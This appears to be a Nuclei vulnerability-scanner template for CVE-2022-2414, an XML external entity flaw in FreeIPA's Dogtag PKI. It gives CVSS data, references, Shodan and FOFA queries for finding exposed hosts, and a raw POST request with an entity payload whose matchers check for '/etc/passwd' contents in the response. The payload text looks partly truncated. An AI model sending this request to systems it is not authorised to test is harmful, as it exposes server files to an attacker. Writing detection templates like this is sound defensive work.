id: CVE-2022-2414 info: name: FreeIPA - XML Entity Injection author: DhiyaneshDk severity: high description: | Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. remediation: | Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 - https://github.com/dogtagpki/pki/pull/4021 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2414 cwe-id: CWE-611 epss-score: 0.01256 epss-percentile: 0.84092 cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dogtagpki product: dogtagpki shodan-query: title:"Identity Management" html:"FreeIPA" fofa-query: title="Identity Management" tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki http: - raw: - | POST /ca/rest/certrequests HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml ]> &ent; matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: body words: - "PKIException" - type: word part: header words: - "application/xml" - type: status status: - 400 # digest: 490a0046304402203e01a48643ddc4111a52d8b34ca90c1d803678990761a21ea7e52dbdcf384f87022053892bd3048fc94077b0f1d151dfade945c5ee5c9fa857c5d0203eca2a47d1cf:922c64590222798bb761d5b6d8e72950